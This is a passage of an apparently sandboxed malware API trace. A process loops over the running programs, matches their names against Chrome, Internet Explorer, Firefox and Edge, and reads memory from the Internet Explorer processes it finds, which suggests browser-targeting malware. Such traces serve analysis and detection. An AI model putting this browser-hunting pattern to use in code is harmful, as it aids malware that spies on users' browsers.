	[0238.767] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0238.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.767] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0238.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7ed8
	[0238.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.768] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0238.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.768] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0238.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0238.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7edc
	[0238.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.771] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0238.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.771] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.772] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0238.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.773] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.773] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0238.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7ee0
	[0238.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.774] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0238.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.774] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.774] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0238.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.775] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.775] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0238.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7ee4
	[0238.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.776] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0238.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.777] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.777] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0238.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.777] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.777] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0238.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7ee8
	[0238.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.778] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0238.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.779] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.779] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0238.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.780] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0238.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7eec
	[0238.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.781] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0238.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.782] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.782] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0238.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.783] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.783] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0238.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7ef0
	[0238.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.784] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0238.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.784] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.785] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0238.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.785] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.786] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0238.786] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7ef4
	[0238.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.787] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0238.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.787] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.788] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0238.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.788] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.789] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0238.793] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7ef8
	[0238.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.793] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0238.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.794] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.794] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0238.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.795] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.795] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0238.796] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7efc
	[0238.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.796] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0238.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.796] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0238.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.797] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0238.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.797] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.797] NtQueryInformationProcess (in: ProcessHandle=0x7efc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0238.797] ReadProcessMemory (in: hProcess=0x7efc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0238.797] ReadProcessMemory (in: hProcess=0x7efc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0238.797] ReadProcessMemory (in: hProcess=0x7efc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0238.797] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0238.798] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0238.798] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7f00
	[0238.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.799] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0238.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.799] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0238.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.799] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0238.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.799] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.800] NtQueryInformationProcess (in: ProcessHandle=0x7f00, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0238.800] ReadProcessMemory (in: hProcess=0x7f00, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0238.800] ReadProcessMemory (in: hProcess=0x7f00, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0238.800] ReadProcessMemory (in: hProcess=0x7f00, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0238.800] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0238.800] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0238.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7f04
	[0238.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.801] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0238.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.801] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.802] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0238.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.802] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.802] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0238.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7f08
	[0238.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.803] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0238.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.803] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.804] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0238.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.804] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.804] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.805] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7f0c
	[0238.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.805] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.805] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.806] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.807] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.808] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7f10
	[0238.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.808] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.809] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.809] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.809] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7f14
	[0238.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.810] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.811] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.811] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.812] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.812] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0238.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7f18
	[0238.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.813] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0238.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.813] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.813] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0238.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.814] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.814] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.815] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7f1c
	[0238.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.815] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.815] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.815] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.816] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.816] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7f20
	[0238.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.817] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.817] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.817] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.818] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.818] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0238.819] CloseHandle (hObject=0x4fd0) returned 1
	[0238.819] Sleep (dwMilliseconds=0x64) 
	[0238.916] GetCurrentProcessId () returned 0x110
	[0238.916] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0238.921] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0238.923] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0238.924] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0238.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7f24
	[0238.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.927] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.927] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.928] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.928] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0238.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7f28
	[0238.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.931] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.931] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.931] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.932] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
